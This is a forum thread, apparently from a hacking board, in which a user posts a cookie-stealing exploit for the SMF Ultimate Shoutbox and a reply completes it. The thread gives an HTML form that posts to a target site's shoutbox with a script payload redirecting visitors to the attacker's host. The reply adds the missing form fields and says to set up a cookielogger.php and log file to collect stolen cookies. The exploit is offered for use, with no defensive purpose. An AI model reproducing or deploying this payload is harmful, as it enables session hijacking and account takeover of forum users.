Jump to content
irc_boy

SMF Ultimate Shoutbox Cookie Disclosure Exploit

Recommended Posts

This is your basic shoutbox. Your registers users type in a message and click shout. Guests on your

site (if you give them access to the block) will type in their name, email address and message before

clicking shout.

The format of each 'shout' is Date, Name, Message. If a registered user posts a shout, their name

becomes a link to their profile. If a guest posts a shout, their name is a mailto: to the email

address they entered.

Vulnerabilities:

----------------------------------------

Create an html file :

<center>

<form action="http://WWW.TARGET.COM/index.php?action=shout" method="post">

<input value="http://WWW.TARGET.COM/index.php?" name="qstr" type="hidden">

<input value="" name="email" type="hidden">

<input value=" <SCRIPT>location.href='http://WWW.YOURS

Link to comment
Share on other sites

mersi irc_boy , cand am vrut sa-l pun mi-o dat erroare.

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator to inform of the time the error occurred and of anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

nu e postat tot :(

mai trebuia:

<input value="[HERE MEMBERID EXAMPLE: 2]" name="memberID" type="hidden">

<input value="Message" name="message" size="16" maxlength="300" onfocus="if (this.value == 'Message')this.value=''" type="text">

<input name="submit" value="Shout" type="submit">

</form>

</center>

-----------------------------------------------

Create the page cookielogger.php & logfile.txt

-----------------------------------------------

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...